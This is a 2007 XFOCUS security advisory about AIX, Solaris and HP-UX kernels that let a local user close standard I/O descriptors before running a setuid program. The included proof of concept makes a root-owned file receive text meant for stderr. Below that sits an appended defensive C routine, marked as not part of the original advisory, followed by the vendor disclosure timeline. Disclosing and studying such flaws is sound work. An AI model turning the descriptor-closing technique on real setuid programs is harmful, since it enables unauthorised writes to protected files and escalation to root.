[xfocus-SD-070118] Multiple operating system kernels handle standard I/O in an insecure manner
Source: http://www.xfocus.org  Author: XFOCUS  Published: 2007-01-22

The XFOCUS team (http://www.xfocus.org/) has discovered a vulnerability in multiple operating system kernels that handle the standard I/O file descriptors in an insecure manner.

===================
Affected OS Version

AIX 5.3
Solaris 9
HPUX B11.11
(other versions may also be affected; we did not test them)

===========
Description

The affected operating systems allow a local user to first close fds 0, 1 and 2 and then invoke a setuid process in order to read or write restricted files without authorization, which can further lead to obtaining root privileges.

The affected OSes allow local users to write to or read from restricted
files by closing file descriptor 0 (standard input), 1 (standard output)
or 2 (standard error) before invoking a setuid program. The kernel does
not reopen the closed descriptor, so the next open() in the setuid
program is handed that low descriptor number, and writes the program
intended for its standard output or error then land in the newly opened
file. An attack exploiting this vulnerability may gain root privileges.

====
POC

-bash-3.00$ oslevel -r
5300-03
-bash-3.00$ ls -l bb
-rw-r--r-- 1 root system 0 12月05 20时34 bb
-bash-3.00$ ls -l k
-rwxr-xr-x 1 root system 58242 12月03 23时13 k
-bash-3.00$ ls -l tt
-rwsr-xr-x 1 root system 59096 12月03 23时14 tt (this is a setuid program, called by k)
-bash-3.00$ cat k.c
#include <unistd.h>

int main(void)
{
    close(2); /* close stderr before calling tt */
    execl("./tt", "./tt", (char *)0);
    return 1; /* only reached if execl fails */
}
-bash-3.00$ cat tt.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    printf("euid=%i\n", (int)geteuid());
    int f = open("/tmp/bb", 1); /* 1 == O_WRONLY; gets the lowest free fd, here 2 */
    printf("f=%i\n", f);
    write(2, "hello\n", 6); /* intended for stderr, lands in /tmp/bb */
    return 0;
}

-bash-3.00$ id
uid=202(cloud) gid=1(staff)
-bash-3.00$ ./k
euid=0
f=2   # the error text was written into the bb file
-bash-3.00$ ls -l bb
-rw-r--r-- 1 root system 6 12月05 20时35 bb
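The defence-side counterpart of the PoC, as an added example that is not part of the XFOCUS advisory: a setuid program can bind any closed standard descriptor to /dev/null at startup, so that its own open() calls can never be handed fd 0, 1 or 2. sanitize_stdfds and demo_open_after_close_stderr are hypothetical names; the demo uses /dev/null in place of /tmp/bb and closes fd 2 in-process the way k.c does.

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Ensure fds 0, 1 and 2 are all open. Any one that is closed is bound to
 * /dev/null, so a later open() in the privileged program can never be
 * handed a standard-I/O descriptor. Returns 0 on success, -1 on error. */
int sanitize_stdfds(void)
{
    int fd;
    for (fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1 || errno != EBADF)
            continue;                        /* already open */
        int nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nfd == -1)
            return -1;
        if (nfd != fd) {                     /* lowest free fd was not `fd` */
            if (dup2(nfd, fd) == -1) { close(nfd); return -1; }
            close(nfd);
        }
    }
    return 0;
}

/* Reproduce the advisory's condition in-process: close fd 2 the way k.c
 * does, then see which descriptor the next open() returns (/dev/null
 * stands in for /tmp/bb). With sanitize == 0 the result is 2, the bug;
 * with sanitize == 1 the result is greater than 2. The original stderr is
 * restored before returning. */
int demo_open_after_close_stderr(int sanitize)
{
    int saved, f, result;
    if (sanitize_stdfds() == -1)             /* start from a known state */
        return -1;
    saved = dup(2);
    close(2);
    if (sanitize && sanitize_stdfds() == -1) {
        dup2(saved, 2); close(saved);
        return -1;
    }
    f = open("/dev/null", O_WRONLY);
    result = f;
    if (f >= 0)
        close(f);
    dup2(saved, 2);                          /* put the real stderr back on 2 */
    close(saved);
    return result;
}
```

Calling sanitize_stdfds() before any other open() is the check a setuid binary needs; the kernel-side fix the advisory asks for is for the OS to do the same on exec of a setuid program.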

=========
Time Line
2005-12-xx Discovered this vulnerability
2006-12-12 Initial vendor notification
2006-12-12 HP responded, assigned SSRT061287;
Sun responded but mistook this vulnerability for an
application bug and asked us to figure out the real attack
vector;
AIX: no response;
2007-01-18 Public disclosure

--EOF
